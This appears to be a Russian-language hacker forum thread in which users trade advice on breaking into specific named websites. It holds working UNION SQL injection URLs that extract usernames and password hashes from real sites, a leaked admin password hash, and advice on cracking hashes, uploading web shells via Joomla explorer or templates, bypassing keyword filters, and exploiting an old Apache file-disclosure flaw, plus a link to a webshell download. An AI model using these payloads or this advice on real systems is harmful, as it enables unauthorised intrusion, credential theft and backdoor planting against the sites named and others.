Нашол уязв Просмотр запрещенных файлов Ссылка - http://***.com/<<<<<<<<<<<< Описание уязвимости : просмотр запрещенных файлов Уязвимость Apache позволяет злоумышленнику читать недоступные файлы, путем прибавления символа "<" к запросу этих файлов. Решение: Установите последнюю версию. http://www.apache.org/ Ссылки: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0017 http://www.apacheweek.com/issues/03-01-24#security А как ее юзать не знаю подскажите к примеру как прочитать конфиг.пхп
Всем прива! Тема актуальная! Подскажите пожалуйста чем можно по joomla по каталогам шарить я для этого использую joomla xplorer, что есть еще мож что по лучше))))
http://release.master.dcms.su/info.php?id=1 $id=intval($anket); имхо скулы нет, intval() - переводит в число без точки так что только числа а ими скулу не сделаешь)
Если ты суперадмин, то можешь залить шелл через joomla xplorer (в папку images можешь сразу лить, т.к. там права 777 стоят) и потом гуляй по директориям
Вопрос как моно воспользоваться вот этим? http://rk-triada.ru//d8cms/admin_themes/ И где моно найти ифу про cms nextweb и её уязвимости ,,?? Ивобще у этого сайта http://rk-triada.ru/ что нет уязвимости??? Лично я проверил вроде на все что знаю! (заранее спасибо)
Есть такой сайт http://www.modvlad.ru/ зделал такое http://www.modvlad.ru/photo/?g=-1+union+select+111,222,username,user_password,555, 666+from+forum_users+limit+0.1/* но это только дял форума! как посмотреть всё что есть в базе? И моно залить туду шелл? И если моно то как?
geforce вот так смотри все таблы.. вот правельная база от форума.. Administrator:$H$9uIjBNujsrtCkk2HuMQPADk9w.i4Mr/ осталось разшифровать.. и залить шелл через темплейты)
А вот деся как мне залить shell??? http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+limit+4,1/*
geforce если есть пасс от админки то разшифруй... и войди в место входа)) а потом уже смотри Залить или не Залить )
wow.alania.net ну собсветнно для данного ресурса file_priv Нема то есть через скулю шелл не залить что не удивительно если пасс к админке лежит в базе попробуй его выташить и залить через админку ) Шелл-код (код оболочки, англ. shellcode) — это двоичный исполняемый код, который обычно передаёт управление консоли, например '/bin/sh' Unix shell, command.com в MS-DOS и cmd.exe в операционных системах Microsoft Windows. Код оболочки может быть использован как полезная нагрузка эксплойта, обеспечивая взломщику доступ к командной оболочке (англ. shell) в компьютерной системе. При эксплуатации удаленной уязвимости шелл-код может открывать заранее заданый порт TCP уязвимого компьютера, через который будет осуществляться дальнейший доступ к командной оболочке, такой код называется привязывающим к порту (англ. port binding shellcode). Если шелл-код осуществляет подключение к порту компьютера атакующего, что производится с целью обхода брандмауэра или NAT, то такой код называется обратной оболочкой (англ. reverse shell shellcode). взято из вики
если тебе для web уязвимости, то нужен webshell хороший от маднета http://madnet.name/files/1/10.html
а вот это инекция http://rk-triada.ru/index.php?page=999?? И это http://www.15rus.ru//e107_plugins/coppermine_menu/index.php?cat=-999??
Фильтрация, хороший сайт хорошая sql на нём) Но from фильтруется, Можно это кат-то обойти? Есть подозрение на хостинг. удалил